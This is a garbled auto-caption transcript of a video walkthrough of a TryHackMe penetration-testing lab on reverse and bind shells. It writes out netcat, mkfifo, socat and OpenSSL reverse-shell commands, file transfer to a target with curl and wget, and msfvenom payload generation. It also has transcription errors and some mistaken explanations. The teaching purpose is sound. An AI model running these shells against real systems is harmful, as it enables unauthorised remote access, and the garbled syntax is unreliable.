What the Shell? - TryHackMe Junior Penetration Tester: 8.1

Captions
hello and welcome to our last section in our triac Junior penetration testing learning path first off if you made it this far congratulations in our previous episode we checked out menis the very popular exploitation framework we learned how to use it and unlock its full potential in today's episode we're going to learn how to use reverse shells an introduction to sending and receiving reverse or buying shell when exploiting Target machines I'm Brock from brockard security and let's get hacking not want so what is a shell and no not the thing that a turtle uses for armor before we can get into the intricacies of sending and receiving shells it's important to understand what a shell actually is in the simplest possible terms shells are what we use when interfacing with a command line environment or CLI in other words the common bash or sh programs in Linux are examples of shells as our cmd.exe in Powershell on Windows when targeting remote systems it is sometimes possible to force an application running on the server such as a web server for example to execute arbitrary code when this happens we want to use this initial access to obtain a shell running on the Target in simple terms we can force the server to either send us command line access to the server via a reverse shell or to open up a port on the server which we can connect to in order to execute further commands a bind shell we'll be covering both of these scenarios in further detail throughout this lesson the bulk of the room is made up of information with examples given in code blocks and screenshots there are two VMS one Linux One windows in the last two tasks of the room these can be used to practice the techniques demonstrated there are example practice questions in task 13 feel free to work through these or follow along with the tasks as you complete them there's lots of syntax in this lesson so we're just going to use their examples I'm not going to use the attack box until the end where the practice 
questions are going to be so I would not recommend trying to do these with your own attack box while I'm going through this lesson you can of course but you're going to be doing a lot of pausing and stopping and replaying so just treat it like you're getting equated with these Concepts and if you literally only did one example and you got something from that great of course my demonstrations are just one way there's lots of other ways if you have a different way or a better way leave it in the comments so other people can try it out and with that let's Jump Right In There are a variety of tools that we'll be using to receive reverse shells and to send bind shells and general terms we need malicious Shell Code as well as a way of interfacing with the resulting shell we will discuss each of these briefly below netcat is the traditional Swiss army knife of networking it is used to manually perform all kinds of network interactions including things like Banner grabbing during enumeration but more importantly for our uses it can be used to receive reverse shell and connect to remote ports attached to bind shells on a Target n Cat shells are very unstable by default but can be improved by techniques that we will be covering in an upcoming task socat is like netcat on steroids it can do all the same things and many more socat shells are usually more stable the netcat shells out of the box in this sense it is vastly superior to netcat however there are two big catches number one the syntax is more difficult number two netcat is installed on virtually every Linux distribution by default socat is very rarely installed by default there are workarounds to both of these problems which we will cover later on both socat and nkat have .exe versions for use on Windows systems the exploit for/ multi slh Handler module of the Metasploit framework is like socat netcat used to receive reverse shells which you may remember from the previous lesson due to being part of the metas 
framework multi for/ Haler provides a fully fledged way to obtain stable shells with a wide variety of further options to improve the cot shell it's also the only way to interact with a interpeter shell and is the easiest way to handle staged pay loads both of which we'll look at in task 9 like multi for/ Handler msf Venom is technically part of the menit framework however it is shipped as a standalone tool msf Venom is used to generate payloads on the Fly Wist msf Venom can generate payloads other than reverse and bind shelves these are what we will be focusing on in this lesson msf Venom is an incredibly powerful tool so we'll go into its application in much more detail in a dedicated task aside from the tools we've already covered there are some repositories of shells in many different languages one of the most prominent of these is payloads all the things the pentest monkey reverse shell cheat sheet yes that's what it's called is also commonly used in addition to these online resources Cali Linux also comes pre-installed with a variety of web shells located at/ user share SL webshell the SEC list repo repository though primarily used for wordless also contains some very useful code for obtaining shells on to task three types of shells at a high level we are interested in two kinds of shells when it comes to exploiting a Target reverse shells and bind shells reverse shells are when the target is focused to execute code that connects back to your computer or reverses it on your own computer you would use one of the tools mentioned in the previous task to set up a listener which would be used to receive the connection reverse shells are a good way to bypass firewall rules that may prevent you from connecting to arbitrary ports on the target however the drawback is that when receiving a shell from a machine across the internet you need to conf your own network to accept the shell this however will not be a problem on the triack Me Network due to the method by which 
we connect into the network buying shells are when the code executed on the target is used to start a listener attached to a shell directly on the target this would then be open to the internet meaning you connect to the port that the code has opened and obtained remote code execution that way this has the advantage of not requiring any configuration on your network but may be prevented by firewalls protecting the target as a general rule reverse shells are easy to execute and debu however we will cover both examples below don't worry too much about the syntax here we'll be looking at it in upcoming tasks instead note the difference between reverse shells and bind shells and the following simulations all right so first up we have the reverse shell nine times out of 10 this is what you're going to be going for especially in Capture the Flag challenges like those of tryck me take a look at the following image on the left we have reverse shell listener This Is What receives the connection on the right is a simulation of sending a reverse shell in reality this is is more likely to be done through code injection on a remote website or something along those lines picture the image on the left as being your own computer and the image on the right as being the Target on the attacking machine we see pseudo NC for netcat dlv NP 443 on the target we can see they're connecting to that netcat session by using the NC command followed by the local IP address the port D ebin SL bash notice that after running the command on the right the list Len receives a connection when the who Ami command is run we see that we are executing commands as the target user signed in as them the important thing here is that we're listening on our own attacking machine and sending a connection from the target bind shells are less common but still useful once again take a look at the following image you get on the left we have the attacker's machine computer on the right we have a simulated Target just 
to shake things up a little we'll use a Windows Target this time first we start a list on the target this time we're also telling it to execute C cmd.exe or the command prompt then with the listener up and running we connect from our own machine to the newly open port and as you can see on the target machine they start a listener on the Target by running net cat- lvmp the port number the newly open port 8080 D and then in quotations cmd.exe and then on the tagging machine we simply connect to that netcat session we run netcat machine IP and the port number as you can see this once again gives us code execution on the remote machine note that this is not specific to Windows the important thing to understand here is that we're listening on the target then connecting to it with our own machine the final concept which is relevant in this task is that of interactivity shells can be either interactive or noninteractive interactive is if you've used Powershell bash zsh sh or any other standard CLI environment then you will be used to interactive shells these allow you to interact with programs after executing them for example take the SSH login prompt SSH you type in the name of the user you add and then you put in the IP address of the Local Host here you can see that it's asking interactively that the user type either yes or no in order to continue this connection it's an interactive program which requires an interactive shell in order to run in order to proceed it requires that response of yes or no noninteractive shelves don't give you that luxury in a non-interactive shell you're limited to using programs which do not require user interaction in order to run properly unfortunately the majority of simple reverse and bind shell are non-interactive which can make further exploitation trickier how are you supposed to exploit something if you can't interact with it let's see what happens when we try to run ssh in a non-interactive shell as you can see here they have SSH 
username Murray at the local host or IP address of the local host and you can see it blanks out notice that the who am I command which is non- interactive executes almost perfectly but the SSH command which is interactive gives us no output at all as an interesting side note the output of an interactive command does go somewhere however figuring out where is an exercise for you to attempt on your own suffice to say that interactive programs do not work in non-interactive shells additionally in various places throughout this task you will see a command in screenshots called listener this command is an alias unique to the attacking machine used for demonstrations and is a shorthand way of typing suit rlw a net cat- LVN p443 so in other words it will not work on any other machine unless the Alias has been configured locally which type of shell connects back to a listening port on your computer reverse or bind well if it's going to reverse back remember that's going to be listening so it's going to be R Who nice job you've injected malicious code into a website is the shell you receive likely to be interactive yes or no the answer is unfortunately no most reverse shells the majority of them are not interactive when using a bind shell would you execute a listener on the attacker or the target this is bind it's going to be executed on that Target because everything that exploit needs is right there as mentioned previously netcat is the most basic tool in a pentesters toolkit when it comes to any kind of networking with it we can do a wide variety of interesting things but let's let's focus for now on shells in the previous task we saw that reverse shells require Shell Code and a listener there are many ways to execute a shell so we'll start by looking at listeners the Syntax for starting a netcat listener using Linux is this NC short hand for netcat dlv NP and then the port number of the target dasl is used to tell that cat that this will be a listener Das V is used to 
request a verbose output DN tells netkat not to resolve host names or use DNS domain name system simply links IP addresses to website addresses so when it's saying to not resolve host names or use DNS simply saying don't look for any web addresses this is the IP address that's all you're going to need- P indicates that the port specification will follow the example in the previous task used Port 443 realistically you could use any port you like as long as there isn't already a service using it be aware that if you choose to use a port below 1024 you will need to use pseudo when starting a listener that said it's often a good idea to use a well-known port number 80 443 or 53 being good choices as this is more likely to get past those outbound firewall rules on the target a working example of this would be pseudo netcat or nc- lvmp Port 443 a commonly used port for reverse sh what is 443 used for what [Music] service the service would be that's right https hypertext transfer protocol secure we can then connect back to this with any number of payloads depending on the environment on the target an example of this is displayed in the previous task if we're looking to obtain a bind shell on a Target then we can assume that there is already a listener waiting for us on a chosen Port of the target for example with all the prep work already done in the Target system for combine shells we can assume that all we need to do is connect to it the Syntax for this is relatively straightforward netcat the target IP address and then the chosen Port this case if we wanted to connect back to this netcat session it's using Port 443 so we'd simply do netcat the IP address and then 443 we will look at using netcat to create a listener for this type of shell in task 8 what's important here is that you understand how to connect to a listening Port using netcat which option tells netcat to listen well that would simply be NC short for netcat nope well if you remember from our list up here 
the DHL option is used to tell netcat to listen and we can see here that is correct how would you connect to a bind shell on the IP address 10101011 with port number 8080 well we'll start our Command using NC to get that netcat started we'll use the option of- L to create a listener we'll type in the IP address 10101 10101011 port number is going to be 88 and we can see here if we press enter that's correct and we wouldn't even need to put that DHL option there with bind shells it's the IP address and then the port because it's something we're connected to that's already started up on that Target machine the hard work in other words is done okay so we've caught or connected to a netcat shell what next these shells are very unstable by default pressing control C kills the whole thing they're noninteractive and often have strange formatting errors this is due to net catch shells really being processes running inside a terminal rather than being Bona terminals in their own right fortunately there are many ways to stabilize netcat shells on Linux systems we'll be looking at three here stabilization of Windows reverse shells tends to be significantly harder however the second technique that we'll be covering here is particularly useful for it the first technique we'll be discussing is only applicable to Linux boxes as they will nearly always have python installed by default Windows may not have python installed usually not installed this is a three-stage process number one first thing to do is use Python DC import PTY PTY dos spawn located in the bin bash which uses python to spawn a better featured bash shell note that some targets may need the version of python specified if this is the case replace python with python 2 or Python 3 as required at this point our shell will look a bit prettier but we still won't be able to use tab autocomplete or the arrow keys and contrl c will still kill the shell step two is export term equals x term this will give us access to term 
commands such as clear number third and most importantly we will back around the shell using control Z which you may remember from the metas lesson previously back in our our own terminal we use stty ra- Echo semic FG this does two things first it turns off our own terminal Echo as specified with the raw Das Echo command it then foregrounds the shell thus completing the process so all those features tab autocompletes the arrow keys control C killing the whole process is enveloped within that terminal Echo so here they're starting the netcat what kind of shell this is going to be revers because they're using net cat- LVN p and thus starting the netcat listener on Port 443 they then use Python 3 to spawn a better featured bass shell they then export the term command so they can use commands such as clear then they background the session using contrl Z and it says stopped here but it's not really stopped it's just backgrounded and then to get back into the shell they would use the foreground command or the FG command but they add the stty raw Das Echo command prior which is going to turn off the echo terminal or The Terminal echo which contains things like Auto completes for tabbing the arrow keys and control C to kill the process so you may not want to do that last step if you still want to use control C to kill the process easily as you can see after that terminal Echo was turned off they tried control C nothing happened they then run an SSH command to their next Target this is because they turned off the terminal Echo command note that if the shell dies any input in your own terminal will not be visible as a result of having disabled the terminal Echo to fix this type reset and press enter so if you turn off the terminal Echo but find yourself wanting to use the tab autocompletes or press contrl Z to easily kill the process well you can just type reset and it'll be back to normal or just don't do the third step technique two RL wrap RL wrap is a program which in 
simple terms gives us access to history tab autoc completion and the arrow keys immediately upon receiving a shell however some manual stabilization must still be utilized if you want to be able to use control C inside the shell RL wrap is not installed by default on Cali so first install it with pseudo AP install RL WP to use RL WP we invoke a slightly different listener RL WP nc- lvmp and then the port number prepending our netcat listener with RL WP gives us a much more fully featured shell this technique is particularly useful when dealing with window shells which are otherwise notoriously difficult to stabilize when dealing with the Linux Target it's possible to completely stabilize by using the same trick as in step three of the previous technique backgrounding the Shell with control Z then use stty ra- Echo semicolon FG to foreground that session and to stabilize and re-enter the shell technique three is socat the third easy way to stabilize a shell is quite simply to use an initial netcat shell as a stepping stone into a more fully featured socat shell bear in mind that this technique is limited to Linux Target as a socat shell on Windows will be no more stable than a netcat shell to accomplish this method of stabilization we would first transfer a socat static compiled binary which is a version of the program compiled to have no dependencies up to the Target machine a typical way to achieve this would be using a web server on the attacking machine inside the directory containing your socat binary pseudo python 3-m creating an HTTP server using Port 80 then on the target machine using the netcat Shell to download the file on Linux this would be accomplished with curl or WG WG the IP address of that python server socat d/ tm/ socat for the sake of completeness in a Windows command line environment the same can be done with Powershell using either invoke dweb request or web request system class depending on the version of Powershell installed and they have 
the example there we will cover the Syntax for sending and receiving shells with socat in the upcoming tasks with any of the above techniques it's useful to be able to to change your terminal size this is something that your terminal will do automatically when using a regular shell however in a reverse shell or a bind shell if you want to use something like a text editor which overwrites everything on the screen it must be done manually they then show us the process to manually change the terminal TTY size on a reverse or bind shelf first in the terminal they type st- A this will give a large stream of output they then note down the rows and columns values they then match the rows and Columns of of the attacking machine to the Target Machine by typing stty rows in the reverse or bind shell Target system they fill in the numbers they got from running the command in their own terminal this will change the registered width and height of the terminal thus allowing programs like text editors which rely on such information being accurate to correctly open how would you change your terminal size to have 238 columns well we do the command stt y to start out and then we do calls for columns and 238 which what is the Syntax for setting up a Python 3 web server on Port 80 well that's going to be using pseudo Python 3 space- m HTTP do server and then the port number 8 press enter and there we go you can also see that they use pseudo in the example socat is similar to netcat in some ways but fundamentally different in many others the easiest way to think about socat is as a connector between two points in the interest of the this will essentially be a listening port in the keyboard however it could also be a listening port in a file or indeed two listening ports all so cat does is provide a link between two points much like the portal gun from the portal games once again let's start with reverse shells as mentioned previously the Syntax for socat gets a lot harder than netcat 
just's the syntax for a basic reverse shell listener in soat we have socat TCP DL colon the port number and then dash at the end as always with socat this is taking two points a listening port and a standard input and then connecting them together the resulting shell is unstable but this will work on either Linux or Windows and is equivalent to net cat- lvmp the port number on Windows we would use this command to connect back socat TCP coin the local IP coin the local Port exec coin powershell.exe comma pipes the pipes option is used to force Powershell or CMD exe to use Unix style standard input and output the equivalent command for a Linux Target is socat TCP Co local IP Co local Port exec Co bash DLI in quotations for bind shells on a Linux Target we would use the following command socat TCP DL coin the port number exec coin B- Li and quotations and on a Windows Target we would use this command for a listener so cat TCP DL the port xcon powershell.exe comma pipes we use the pipes argument to interface between the Unix and windows way of handling input and output in the command line environment regardless of the target we use this command in our attacking machine to connect to the waiting list socat TCP coin the target IP address coin the Target Port and then a space Dash now let's take a look at one of the more powerful uses for socat a fully stable Linux TTY reverse shell this will only work when the target is Linux but is significantly more stable as mentioned earlier soad is an incredibly versatile tool however the following technique is perhaps one of its most useful applications here is the new listener syntax we have socat TCP DL colon the port number file colon single quote TTY single quote comma raw comma Echo equals zero let's break this command down into two parts as usual we're connecting two points together in this case those points are a listening port and a file specifically we are passing in the current TTY as a file and setting the echo to zero 
this is like the netcat trick that we learned earlier using control Z and bringing it back into the foreground with the added bonus of being immediately stable and hooking into a full TTY the first listener can be connected to with any payload however this special listener must be activated with a very specific socat command this means that the target must have a socat installed most machines do not have socat installed by default however it's possible to upload a pre-compiled socat binary which can then be executed as normal the special command is as follows socat TCP coin attacker IP coin attacker Port exec coin bash DLI in quotations and then comma with the arguments this is a handful so let's break it down the first part is easy right we have socat TCP the attacker IP and the attack Port we're linking up with the list are running on our own machine the second part of the command creates an inter active bash session with exec coin bash DLI we're also passing these arguments PTY which allocates a pseudo terminal on the target part of the stabilization process the STD err option makes sure that any airor messages get shown in the Shell remember with interactive shells you're likely to see those air messages but with non-interactive shells that can be a problem STD RR fixes that sigan passes any control C commands through into the subprocess allowing us to kill commands inside the shell sets ID creates the process in a new session while say stabilizes the target attempting to normalize it now that's a lot to take in so let's see it in action as normal on the left we have a listener running on our local attacking machine on the right we have a simulation of a compromised Target running with a non-interactive shell using the non-interactive netcat Shell we execute the special socat command and receive a fully interactive bash shell on The socat Listener to the left note that the socat shell is fully interactive allowing us to use interactive commands such as SSH this 
can then be further improved by setting the stty values as seen in the previous task which will let us use text editors such as Vim or Nano if at any point a socat shell is not working correctly it's well worth increasing the verocity by adding - d space- d into the command this is very useful for experimental purposes but is not usually necessary for General use how would we get so to listen on TCP port 8080 well assuming that we have the pseudo socat command typed in already we would type in TCP DL and then colon the port number 8080 press enter there we go got it correct nice job once again guys don't get caught up in the syntax this is a lot to take in especially for beginners so just try to start to get familiarized with these Concepts suffice it to say that anytime TCP was used as part of a command this should be replaced with open SSL when working with encrypted shells we'll cover a few examples at the end of the task but first let's talk about certificates we first need to generate a certificate in order to use encrypted shells this is easi to do on our attacking machine this command creates a 248 bit RSA key with matching CT file self-signed and valid for just under a year when you run this command it will ask you to fill in information about the certificate this can be left blank or filled randomly we then need to merge the two created files into a single pem file you can do that with a simple command as cat the two files a right arrow and then the new file name now when we set up our reverse shell listener we use the socat command this sets up an open SSL listener using our generated certificate verify equals z tells the connection to not bother trying to validate that her certificates has been properly signed by a recognized Authority please note that the certificate must be used on whichever device is listening to connect back we would use socat op SSL the IP address the local Port verify equals z and then exec b bash the same technique would apply for 
bind shell Target the socat open SSL and with the attacker machine we have the target IP and the Target Port verify equals zero telling the connection to not bother trying to validate the certificate by a recognized Authority and who is the one to use the certificate file not the attacker it's the listening device the Target in this case is the one who uses cert equal shell. pem the certificate file again note that even for Windows Target the certificate must be used with the listener so copying the pen file across for a bind shell is required the following images shows an open SSL reverse shell from a Linux Target as usual the target is on the right the attacker is on the left so in the example the attacker on the left uses the open SSL w-- new key creating that RSA certificate and The Listener is just listenting on the rightand side the target they use cats to merge those two files into one encrypted pem certificate so what's the goal here well the goal is to create an interactive shell right now it's non interactive but there's a key detail at the end verify equals zero which bypasses checking for any valid certificate so really they can use whatever certificate they like they can use their own certificate which is what they've done to create an interactive shell a fully interactive shell using socat but after the pem file is created and passed over we can see that we do have that interactive shell this technique will also work with the special Linux only TTY shell covered in the previous task feel free to use the Linux practice box Deployable at the end of the room to experiment if you're struggling to obtain the answer let's walk through this what is the Syntax for setting up an open SSL listener using the TTY technique from the previous task using Port 53 and a pen file called encrypt pen and they give us the hint the syntax for this without the open SSL encryption is socat TCP L coin 53 the file coin single quote TTY single quote comma raw comma Echo equals 
z now that syntax is actually from where the previous task you guessed it so if we check this out in task six and if you scroll down past the bash shells to the Linux TTY reverse shell techniques you'll see that the First Command right here socat TCP DL Port file coin TTY raw Echo equals z is the command that we want to copy so we'll go ahead and copy that go back to task seven and you will notice that the shadow an here looks a little bit off with the commas because we only have two and they had four in their Shadow answer as you can see one two 3 four nonetheless we'll continue on and we can see that socat TCP DL we're going to change TCP DL to what it's going to be open SSL that's what they're asking for in this question so we'll go ahead and change that the coin will be the same the port number is going to change to Port 53 so we'll go ahead and change that to 53 file is going to stay the same TTY is going to stay the same that's the same technique and it's going to be raw Echo equals z but we're not going to stop there remember we're not just changing it to open SSL from the previous command for the Target to set up an open SSL listener we have this socat open SS sl- listen called then the port number so we're going to go ahead and change that to op SSL D list then we're able to clear out that port and change that to 53 which is the port that they ask in the question then we'll go back up and we can see that the next command for the op SSL listener example is CT equal shell. pem and this is after a comma after the port so we'll do a comma after the port 53 then we'll pck paste that in seert equal shell. 
pem and this is actually going to be encrypt pem which is the file that they asked for in this question so we'll change that from Shell to encrypt looks like the syntax shows aha verify equals z that is going to bypass the authentication for this certificate so that no one's checking it all right so verify equals 0 is going to be right after the encrypt pen after the comma verify equals z and looks like after verify equals z there's no comma goes straight into the. cmd.exe comma pipes still for us that's going to be our file coin TTY raw Echo equal Z press enter and looks like it's correct nice job guys that one was a little bit of a do hats off to you guys that was definitely one that you had to work through a little bit in order to get the correct outcome so I don't blame you if you just looked at the answer on this one because they're pulling stuff from task six they're pulling stuff from task 7 it's just kind of all over the place the main thing is just understanding more how socat works not so much what the actual syntax is this is not stuff that you need to memorize guys don't get caught up in memorization use your brain on just trying to understand the concepts okay so if your IP is 101010 do5 what syntax would you use to connect back to the listener well the previous command that we just entered was for the Target that was the target machine now what enter the attacker machine and put in that IP address so we're going to go ahead and copy that syntax and we'll go ahead and plop that in there socat open SSL the target IP which is going to be 101010 do5 they provided that for us then call in the Target Port and that's going to be 53 verify equals z uhoh that's incorrect the Syntax for this without the open SSL encryption is soat TCP the IP address exec B- Li and then those options there at the end that was actually from the previous task so we'll go back to task six so right after that command that we copied previously the socat TCP DL normal TTY reverse 
shell technique command, we will go ahead and copy that special command, which is the socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li" and then all those arguments at the end which help make this a stable interactive shell. So we're going to go ahead and copy that, go back to task 7, go ahead and paste that in. So we're going to change the TCP to OPENSSL, we change the attacker IP to 10.10.10.5, we'll change that attacker port to 53, we'll leave the EXEC:"bash -li" and those arguments, and press submit. Nice job. That was a little overkill, lots of syntax that maybe we didn't really need to go into, so the concept they were trying to teach here is encrypted shells, but they kind of jumped right into it. It's better to have a familiar understanding with certificates and certificate authorities before we just go in and use these crazy long syntax commands, right? So you don't need to memorize this, don't stress yourself out, just get through the lesson and try to learn some of the concepts and just get familiar with it, and just dip your toe in the water.

We'll soon be looking at generating payloads with msfvenom, but before we do that let's take a look at some common payloads using the tools we've already covered. The previous task mentioned that we'd be looking at some ways to use netcat as a listener for a bind shell, so we'll start with that. In some versions of netcat, including the nc.exe Windows version included with Kali under /usr/share, there's -e /bin/bash. Connecting to the above listener with netcat would result in a bind shell on the target. Equally, for a reverse shell, connecting back with nc <LOCAL-IP> <PORT> -e /bin/bash would result in a reverse shell on the target. However, this is not included in most versions of netcat, as it's widely seen to be insecure. Funny that, huh? On Windows, where a static binary is nearly always required anyway, the technique will work perfectly.

Here we have the mkfifo command, the command to create a named pipe in Linux; we have the /tmp/f, semicolon, so we have the first part of the pipe and then we have the second part of the pipe it's being piped into. The following paragraph is a technical explanation of the command; it's slightly above the level of this room, maybe a little bit more than slightly, so don't worry if it doesn't make much sense for now. The command itself is what matters. The command creates a named pipe at /tmp/f. It then starts a netcat listener and connects the input of the listener to the output of the named pipe. The output of the netcat listener, i.e. the command we send, then gets piped directly into sh, sending the stderr output stream into stdout and sending stdout itself into the input of the named pipe, thus completing the circle. A very similar command can be used to send a netcat reverse shell. This command is virtually identical to the previous one, other than using the netcat connect syntax as opposed to the netcat listen syntax, so it's just one change pretty much from the previous command: instead of -lvnp, which is the listening syntax, the syntax for connecting uses the IP address.

When targeting a modern Windows server, it's very common to require a PowerShell reverse shell, so we'll be covering the standard one-liner PSH reverse shell here. The command is very convoluted, so for the sake of simplicity it will not be explained directly here. It can, however, be an extremely useful
one-liner. Here we have the powershell -c. Once again, do not get hung up on the syntax here; this is a big command. It's a one-liner PSH reverse shell, which is using a PowerShell reverse shell to target a modern Windows server. In order to use this we need to replace the IP address and the port with an appropriate IP and choice of port. It can then be copied into a cmd.exe shell, or another method of executing commands on a Windows server such as a web shell, and executed, resulting in a reverse shell. So up top we have the listener; on the bottom, the attacking machine, and we can see that long big one-liner coming in right there, and we can see that they have changed the IP address to 10.11.12.223 and the port to 443. For other common reverse shell payloads, PayloadsAllTheThings is a repository containing a wide range of shell codes, usually in one-liner format, for copying and pasting in many different languages.

What command can be used to create a named pipe in Linux? And the hint tells us there are technically two answers to this question; the accepted one is the answer mentioned in this task, so that's going to be this mkfifo command. mkfifo: let's go ahead and copy that and press enter. Woohoo! And you can go ahead and check out that PayloadsAllTheThings link; they have a lot of cool payloads available in there, and we'll click complete.

msfvenom, which we've used in our previous lesson, is the one-stop shop for all things payload related. Part of the Metasploit framework, msfvenom is used to generate code for primarily reverse and bind shells. It is used extensively in lower-level exploit development to generate hexadecimal shellcode when developing something like a buffer overflow exploit; however, it can also be used to generate payloads in various formats, for example .exe, .aspx, .war, .py for Python. It's this latter function that we'll be making use of in this lesson. There is more to teach about msfvenom than could ever be fit into a single room, let alone a single task, so the
following information will be a brief introduction to the concepts that will prove useful for this lesson. The standard syntax for msfvenom is as follows: we have msfvenom -p, the payload, and the options. For example, to generate a Windows x64 reverse shell in an exe format, we could use msfvenom -p, and then we have the payload, we have the format exe, and then we have the option -o, then we list the LHOST and the LPORT. The four options would be: -f, the format, specifies the output format, in this case that is an executable or exe file. The -o is the output location and file name for the generated payload; in this case it's going to be named shell.exe. LHOST=<IP address> specifies the IP address to connect back to; when using TryHackMe this will be your tun0 IP address. If you cannot load the link, then you're not connected to the VPN. Go ahead and try that link if you'd like; as you can see I'm not connected to the VPN, so it's just going to stall out. Don't worry about connecting to that TryHackMe VPN if you have not done so already; it won't be required to finish this lesson. The LHOST they have specified as 10.11.12.223, and the LPORT is the port on the local machine to connect back to; this can be anything between 0 and 65,535 (the total number of ports) that isn't already in use. However, ports below 1024 are restricted and require a listener running with root privileges. We can see the port has been set to 443, or the HTTPS port.

Before we go any further, there are two concepts which must be introduced: staged reverse shell payloads and stageless reverse shell payloads. Staged payloads are sent in two parts. The first part is called the stager, and this is a piece of code which is executed directly on the server itself. It connects back to a waiting listener but doesn't actually contain any reverse shell code by itself; instead it connects to the listener and uses the connection to load the real payload, executing it directly and preventing it from touching the disk, where it could be caught
by traditional antivirus solutions. Thus the payload is split into two parts: a smaller initial stager, then the bulkier reverse shell code which is downloaded when the stager is activated. Staged payloads require a special listener, usually the Metasploit multi/handler, which will be covered in the next task. You may remember the multi/handler used in the Metasploit lesson previously. Stageless payloads are more common; these are what we've been using up until now. They are entirely self-contained, in that there is one piece of code which, when executed, sends a shell back immediately to the waiting listener. Stageless payloads tend to be easier to use and catch, like a fly ball; however, they are also bulkier and are easier for an antivirus or intrusion detection program to discover and remove. Staged payloads are harder to use, but the initial stager is a lot shorter and is sometimes missed by less effective antivirus software. Modern-day antivirus solutions will also make use of the Antimalware Scan Interface (AMSI) to detect the payload as it is loaded into memory by the stager, making staged payloads less effective than they would have once been in this area.

On the subject of Meterpreter, another important thing to discuss is a Meterpreter shell. Meterpreter shells are Metasploit's own brand of fully featured shell. They're completely stable, making them a very good thing when working with Windows targets. They also have a lot of inbuilt functionality of their own, such as file uploads and downloads. If we want to use any of Metasploit's post-exploitation tools then we need to use a Meterpreter shell; however, this is a topic for another time. The downside to Meterpreter shells is that they must be caught in Metasploit. If you have not checked out the Metasploit modules yet, go ahead and do that, because this isn't the best introduction; you may want to go through those lessons first, the Introduction to Metasploit, Meterpreter, and Exploitation and Post-Exploitation. They've got things in there that are some
pretty good nuggets of knowledge, so check it out. When working with msfvenom it's important to understand how the naming system works. The basic convention is as follows: we have the OS, or the operating system, we have the arch, and then we have the payload; for example linux/x86/shell_reverse_tcp. Oh, and by the way, arch, or architecture, is simply the number of bits for the processors that are using that operating system; most processing bits are x64, which you may find on your own system. This command would generate a stageless reverse shell for an x86 Linux target. The exception to this convention is Windows 32-bit targets; for these the architecture is not specified, for example windows/shell_reverse_tcp, just the OS and the payload. For a 64-bit Windows target the architecture will be specified as normal: x64. x64, because most systems use 64-bit processors. In the above examples the payload used was shell_reverse_tcp; this indicates that it was a stageless payload. How? Stageless payloads are denoted with underscores. The staged equivalent to this payload would be shell/reverse_tcp, as staged payloads are denoted with another forward slash. This rule applies to Meterpreter payloads. A Windows 64-bit staged Meterpreter payload would look like this; staged is going to have multiple forward slashes in there. You may get confused because the underscore is still within the reverse_tcp payload, but we have the majority of forward slashes all throughout. You're looking right before the reverse, or where the end of the payload starts: if it's /reverse_tcp it's going to be staged, if it's _reverse_tcp it's going to be stageless. And here we can see a Linux 32-bit stageless Meterpreter payload would look like this: linux/x86/meterpreter_reverse_tcp. That's a lot of forward slashes, but hey, wait, the underscore reverse_tcp means that it's stageless. Aside from the msfconsole man page, the other important thing to note when working with msfvenom is msfvenom --list payloads. It's going to list all the payloads and can be used to list
all available payloads, which can then be piped into grep to search for a specific set of payloads. For example, we could list the payloads and then grep for a specific one, linux/x86/meterpreter. So this is going to give us the full list of available payloads that are using the Linux operating system, x86 for the architecture, which is actually going to be 32 bits. It's weird: x86 and x64. x64 has 64-bit processors, but for some reason old Intel processors that ended with x86, it just kept the name even though it was a 16-bit processor, and now it's a 32-bit processor. So this is going to search for 32-bit processors for the Linux operating system and Meterpreter payloads.

Generate a staged reverse shell for a 64-bit Windows target in a .exe format using your TryHackMe tun0 IP address and a chosen port. And the hint says all you need to do is substitute in your own tun0 address and chosen port. So this room is actually set up a little bit different than most TryHackMe rooms; instead of having the attack box and the attack machine like you would normally do, this actually has required a TryHackMe VPN. Now we're not using the VPN, and you don't have to either; you can just click complete on this, because this question is actually the same as this third question down here. Both questions are asking you to create a staged reverse shell payload for 64-bit target systems; one is a Windows system, which is the first one, one is a Linux system. So we're going to come up with the syntax for the Linux target, and the IP address is also of course going to be different, so it's just the OS and IP address that are different, but it's going to use the same command that was given to us in the task right up here. For example, msfvenom -p, the payload, the file type, which is going to be exe, the naming convention of the file, and then what's the IP address that we're using and what's the port. So we'll go ahead and copy that command and paste it in. So we have the command msfvenom -p; we're going to swap this Windows with a Linux system
because this is a Linux target. So we're going to actually take the command right here from the Linux 32-bit stageless Meterpreter payload; so that's actually another differentiation between the first question and the third question, besides the OS and the file name: it's actually going to be a Meterpreter payload. So we'll go ahead and grab this command right here for Linux systems; x64 is what we're going to change it to. We'll put that in place of the windows/x64/shell/reverse_tcp, which is the basic staged reverse shell payload, and we'll change the x86 to x64. We'll keep the meterpreter_reverse_tcp, that's just one p, and then we'll keep the -f exe; it's still going to be an executable file, it's just going to be an executable file within the Linux target system. So we'll change the name to -o shell, because it's going to be an elf file, and elf is an executable file within Linux systems. So we have that, and then we'll change the LHOST, which is going to be the listening host, to the IP address that they give us, 10.10.10.5, and we'll change the LPORT to the port number that they provide us, 443 for HTTPS. Enter, and that's correct. Nice job guys.

Once again, that first question required the VPN, and of course I'm not using the VPN; if I attempt to look at the tun0 IP address it just errors out, and of course the instructions for connecting to the VPN have of course errored out as well. There are actually instructions, there's actually a room for connecting to the OpenVPN for TryHackMe, but this is actually not required; we actually have the same question asked there in the third question. There's very minor differences between the first question and the third question: the third is going to have a different OS, it's going to have a different file type, the elf, and we have that different IP address of course, and it's also using Meterpreter, but aside from that it's basically the same; it's just how to use a staged reverse shell, and in this case a Meterpreter staged reverse shell.

Which symbol is used to show
that a shell is stageless? So remember, we have the forward slash and we have the underscore; the question is which one is which. It can get kind of confusing, especially if you're seeing multiple underscores or multiple forward slashes. For stageless it's going to be an underscore. You can think of underscore, stageless payloads, as doing everything: bing, bang, bongo, if they still teach that in schools. You can think of a forward slash, the staged payloads, as just a bing, and then it has to connect back to get that bang, and then it has to go back to the target to get that bongo, the full setup. So it's definitely less work to do the stageless, at least when you're actually there executing the payload, but the stageless payloads may take a little bit more time, a little more prep time, to actually get it started. So stageless: bing, bang, bongo; staged is going to be bing, or bing. Now remember, placement is key, and I don't know if TryHackMe is wrong on this or if I just don't understand it, but usually the staged or stageless is indicated by the meterpreter and then reverse, what's in between that: meterpreter_reverse. So technically, when we're looking at this command that we did for question three, it looks like a stageless payload, but they asked us for a staged Meterpreter reverse shell with the 64-bit Linux target, and in the example they show us the windows meterpreter/reverse as the staged payload and then the linux meterpreter_reverse as the stageless payload. So when you're determining if it's a staged or stageless payload, you can look between the meterpreter and reverse, or you can also look at the full file name of that payload, the full thing starting from meterpreter. It 